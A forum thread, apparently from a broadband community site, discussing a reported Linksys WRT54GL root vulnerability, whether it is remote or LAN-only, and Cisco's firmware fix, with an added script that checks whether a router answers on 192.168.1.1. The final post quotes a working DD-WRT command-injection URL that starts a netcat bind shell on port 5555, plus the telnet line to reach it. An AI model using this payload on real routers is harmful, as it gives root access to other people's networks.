antdude (Matrix Ant, Premium Member, join 2001-03-25, US):
Dangerous remote Linksys 0-day root exploit discovered

01:51PM »www.net-security.org/sec ··· id=14234

Uh oh. I have that old router too!

stormbow (Freedom isn't FREE, Premium Member, join 2002-07-31, Simi Valley, CA):
Which models though, all of them? It doesn't seem like the author has a clue that Linksys is a brand not a model.

Smokey Bear (veritas odium parit, Premium Member, join 2008-03-15, Annie's Pub) to antdude [1 recommendation]:
DefenseCode Security YouTube vulnerability demonstration:

»www.youtube.com/watch?v= ··· FKE&hd=1

According to DefenseCode: "exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected."

StuartMW (Premium Member, join 2000-08-06) [1 recommendation]:
I think Linksys routers are Linux or VxWorks based so the exploit might be general to the product line.
Mele20 (Premium Member, join 2001-06-05, Hilo, HI) to antdude:
That article said Linksys was issuing a fix... for that old a Linksys router? I am surprised if that is true. I'm sure they won't be issuing a fix for my nine-year-old Linksys router, which isn't even the last version of that router. The last version would be about eight years old.

kickass69 (Member, join 2002-06-03, Lake Hopatcong, NJ) to antdude:
I have the WRT54GL as mentioned at the bottom of the article. But since I use DD-WRT I don't have to worry about that exploit it seems.

siljaline (I'm lovin' that double wide, Premium Member, join 2002-10-12, Montreal, QC) to antdude [1 recommendation]:
»blog.defensecode.com/201 ··· ing.html
quote:
Months ago, we contacted Cisco about a remote preauth (root access) vulnerability in the default installation of their Linksys routers that we had discovered.
We gave them detailed vulnerability description along with the PoC exploit for the vulnerability.

They said that this vulnerability was already fixed in latest firmware release...
Well, not this particular vulnerability, since the latest official Linksys firmware - 4.30.14, and all previous versions are still vulnerable.

Exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected.
Cisco Linksys is a very popular router with more than 70,000,000 routers sold.
That's why we think that this vulnerability deserves attention.

trparky (Premium Member, join 2000-05-24, Cleveland, OH):
Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?

AVD (Respice, Adspice, Prospice, Premium Member, join 2003-02-06, Onion, NJ) to antdude:
I can't see the YT, but what is the attack vector? If I have a Linksys with WPA encryption, am I vulnerable?

Is the attack through an unassociated computer, someone on the LAN or WLAN, or through the WAN port?

siljaline (I'm lovin' that double wide, Premium Member, join 2002-10-12, Montreal, QC) to trparky:
said by trparky:

Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?

Best bet would be to ask Cisco or see what's going on: »Cisco

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro) to antdude:
said by antdude:

01:51PM »www.net-security.org/sec ··· id=14234

Uh oh. I have that old router too!

As I said in my reply in the other thread on this same subject: »Re: Dangerous remote Linksys 0-day root exploit discovered!
said by NetFixer:

What is being demonstrated in their video is not a remote exploit. Launching an application targeting 192.168.1.1 is not going to access a remote router.

Perhaps they have more that they are not showing in the video, but accessing a router from its LAN interface is not necessarily the same as accessing it from its WAN interface (which would be a requirement to be called a remote exploit). If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).


StuartMW (Premium Member, join 2000-08-06):
Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro):
said by StuartMW:

Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).

Many of the Linksys routers have an internal header that can be converted to a serial interface, but I have never run across a Linksys router (and make no mistake, it is Linksys routers that are being discussed, not real Cisco routers) that had an actual external serial interface from the factory (not even their business class routers have them). However even if the router(s) in question had serial ports, one would not be accessing a serial port via 192.168.1.1 as is shown in the POC video.

StuartMW (Premium Member, join 2000-08-06):
Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

I do have "remote access" on the LAN side but only over HTTPS plus you need my personal certificate. Paranoid? You betchya

(You're not paranoid if they really are out to get you)

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro) [1 recommendation]:
said by StuartMW:

Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface. I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability. This practice may not be universal for all Linksys routers, but I have found it to be so on many of them...my Cisco/Linksys/Vonage RTP300 seems to be an exception to that rule, but it uses Vonage firmware instead of Linksys firmware.

StuartMW (Premium Member, join 2000-08-06) [1 recommendation]:
said by NetFixer:

I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability.

Well, as software engineers say, "it's a feature, not a bug".

I agree that just allows anyone on any subnet to get to the router. WTF?

AVD (Respice, Adspice, Prospice, Premium Member, join 2003-02-06, Onion, NJ) to NetFixer:
said by NetFixer:

They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

Is this true? If I have router A (192.168.1.xxx) plugged into router B (192.168.22.xxx) and I have a device with a browser on B's LAN and type 192.168.1.1, do I still get B's admin page? I can't say I've ever encountered this, and I've been in this environment many times.
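A way to test the behaviour NetFixer describes and AVD asks about, added here as an example and not part of either post: from a host whose LAN is not 192.168.1.0/24, request http://192.168.1.1/ and see whether anything answers. If that address is outside your own subnet, the packet goes to your default gateway, so an answer means the gateway (or something beyond it) is serving the default address. The function names, the verdict wording and the loopback stand-in used for the offline run are this example's own assumptions, not anything from Linksys or the thread.

```python
"""Probe whether a router answers HTTP on the default 192.168.1.1 even when
the LAN it serves uses a different subnet.

Added example for this page; not code from the thread or from Linksys.
Run it from a host behind the router under test and pass that host's own
subnet. Every name below is this example's own.
"""
import ipaddress
import urllib.error
import urllib.request


def is_on_link(target_ip: str, local_cidr: str) -> bool:
    """True if target_ip lies inside the probing host's own subnet.

    If it does not, the host hands the packet to its default gateway, so an
    HTTP answer can only come from the gateway or from something it routes
    to. That is what makes the probe meaningful from a non-192.168.1.x LAN.
    """
    return ipaddress.ip_address(target_ip) in ipaddress.ip_network(local_cidr, strict=False)


def probe_http(url: str, timeout: float = 3.0) -> str:
    """Fetch url and summarise what answered.

    An auth challenge (401) is still an answer: a router admin UI is exactly
    what we expect to be behind a password prompt.
    """
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return f"answered: HTTP {resp.status}, Server={resp.headers.get('Server', '?')}"
    except urllib.error.HTTPError as err:            # 401/403/404 are answers too
        return f"answered: HTTP {err.code}, Server={err.headers.get('Server', '?')}"
    except (urllib.error.URLError, OSError) as err:  # refused, timed out, no route
        return f"no answer ({getattr(err, 'reason', err)})"


def check_default_address(local_cidr: str, default_ip: str = "192.168.1.1",
                          probe=probe_http) -> dict:
    """Combine the two facts needed to read the result.

    `probe` is injectable so the logic can be exercised without a network;
    in normal use the default `probe_http` does the real request.
    """
    on_link = is_on_link(default_ip, local_cidr)
    result = probe(f"http://{default_ip}/")
    if on_link:
        verdict = "inconclusive: the address is inside your own subnet, any host could hold it"
    elif result.startswith("answered"):
        verdict = ("the gateway path serves the default address; compare its page "
                   "with what your router shows on its real LAN IP")
    else:
        verdict = "nothing served the default address from this subnet"
    return {"on_link": on_link, "result": result, "verdict": verdict}


if __name__ == "__main__":
    # Constructed stand-alone run: probes a closed loopback port so the
    # script completes offline. On a real LAN call, for example,
    # check_default_address("192.168.22.0/24") from a host on that subnet.
    print(check_default_address("192.168.22.0/24", default_ip="127.0.0.1"))
```

Read the result together with the router's real LAN address: an "answered" result from a subnet that does not contain 192.168.1.1 is the behaviour NetFixer describes only if the page that comes back is the same router's admin UI, not an upstream router that happens to use the default address, which is why the verdict tells you to compare the two.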
AVD (Respice, Adspice, Prospice, Premium Member, join 2003-02-06, Onion, NJ) to NetFixer:
said by NetFixer:

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree; think public access at a coffee shop or whatnot. A public user on the WLAN should not be able to root the router. This is not the same as physical/software security.

StuartMW (Premium Member, join 2000-08-06):
said by AVD:

A public user on the wlan should not be able to root the router.

Valid point.

Devices on my WLAN or other subnets (than the one my PC's are in) cannot access my router.

EGeezer (Premium Member, join 2002-08-04, Midwest) to NetFixer:
said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.
ke4pym (Premium Member, join 2004-07-24, Charlotte, NC) to antdude:
Hey, since Cisco is going to go back to fix this bug, maybe they can fix it so you can use modern browsers to access the administrator console!

Or would that be asking too much?
pandora (Premium Member, join 2001-06-01, Outland) to Smokey Bear:
The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the YouTube link in the video:

We're still investigating some tricks to exploit this vulnerability from the internet, but for now, yes - it seems safe from the outside of the network. Of course, unless services are available from the internet.

Regards,
Leon Juranic
CEO
DefenseCode

It isn't clear if this exploit affects Tomato, Tomato USB, DD-WRT or any other open source variant of Linux based routers.

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro) to AVD:
said by AVD:

said by NetFixer:

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree; think public access at a coffee shop or whatnot. A public user on the WLAN should not be able to root the router. This is not the same as physical/software security.

And a properly setup public WiFi hotspot will not allow access by WiFi guests to the underlying infrastructure, or between WiFi clients. I have setup many such hotspots, and I used at least small business class routers and separate access points that can be setup to be secure. I have never setup a public WiFi hotspot using a residential grade WiFi router (although I have replaced those with proper equipment).

[sermon]Any business that operates a public WiFi hotspot without using the proper equipment that has been securely configured is just begging to be owned.[/sermon]

BoToMaTiC (Member, join 2003-10-29, Louisville, KY) [1 recommendation]:
Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en ··· /WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

antdude (Matrix Ant, Premium Member, join 2001-03-25, US):
said by BoToMaTiC:

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en ··· /WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

XSS = Cross Site Scripting?

no__1__here (Premium Member, join 2003-10-13, Tomball, TX) to pandora:
said by pandora:

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro) to EGeezer:
said by EGeezer:

said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.

Yes, that (like the vulnerability this thread is about) is strictly a LAN side vulnerability, but an unnecessary one in my opinion. It just makes an XSS attack (which the vulnerability this thread is about seems to be) that much easier. Changing the default values for the LAN side of a residential/soho router has long been a sage security recommendation, and a deliberate bypassing of that measure by the manufacturer just does not seem like a wise move to me.
pandora (Premium Member, join 2001-06-01, Outland) to no__1__here [1 recommendation]:
said by no__1__here:

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

Cisco's patch is up for the WRT54GL, says it fixes issue with XSS (cross site scripting).

siljaline (I'm lovin' that double wide, Premium Member, join 2002-10-12, Montreal, QC) to antdude [1 recommendation]:
Unless already mentioned:
Linksys vuln: Cisco responds - Working on fix for WRT54GL router
»www.theregister.co.uk/20 ··· ys_vuln/

NetFixer (From My Cold Dead Hands, Premium Member, join 2004-06-24, The Boro) to antdude:
Could this "new" exploit just be a variation of an old (2009) Linksys/DD-WRT router vulnerability?

Amazing new exploit for Linksys routers running DD-WRT

The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p \5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555